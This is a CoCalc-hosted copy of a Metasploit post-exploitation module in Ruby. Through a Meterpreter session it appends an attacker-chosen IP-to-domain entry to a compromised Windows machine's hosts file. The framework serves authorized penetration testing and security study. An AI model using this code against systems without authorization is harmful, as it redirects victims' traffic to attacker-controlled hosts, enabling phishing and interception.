CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/inject_host.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'English'

7
class MetasploitModule < Msf::Post

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Manage Hosts File Injection',

14
        'Description' => %q{

15
          This module allows the attacker to insert a new entry into the target

16
          system's hosts file.

17
        },

18
        'License' => BSD_LICENSE,

19
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],

20
        'Platform' => [ 'win' ],

21
        'SessionTypes' => [ 'meterpreter' ],

22
        'Compat' => {

23
          'Meterpreter' => {

24
            'Commands' => %w[

25
              core_channel_close

26
              core_channel_eof

27
              core_channel_open

28
              core_channel_read

29
              core_channel_tell

30
              core_channel_write

31
              stdapi_fs_stat

32
            ]

33
          }

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),

41
        OptString.new('IP', [ true, 'IP address to point domain name to.' ])

42
      ]

43
    )

44
  end

45


46
  def run

47
    if datastore['IP'].nil? || datastore['DOMAIN'].nil?

48
      print_error('Please specify both DOMAIN and IP')

49
      return

50
    end

51


52
    ip = datastore['IP']

53
    hostname = datastore['DOMAIN']

54


55
    # Get a temporary file path

56
    meterp_temp = Tempfile.new('meterp')

57
    meterp_temp.binmode

58
    temp_path = meterp_temp.path

59


60
    begin

61
      # Download the remote file to the temporary file

62
      client.fs.file.download_file(temp_path, 'C:\\WINDOWS\\System32\\drivers\\etc\\hosts')

63
    rescue Rex::Post::Meterpreter::RequestError => e

64
      # If the file doesn't exist, then it's okay.  Otherwise, throw the

65
      # error.

66
      if e.result != 2

67
        raise $ERROR_INFO

68
      end

69
    end

70


71
    print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")

72
    hostsfile = ::File.open(temp_path, 'ab')

73
    hostsfile.write("\r\n#{ip}\t#{hostname}")

74
    hostsfile.close

75


76
    client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', temp_path)

77
    print_good('Done!')

78
  end

79
end

80


81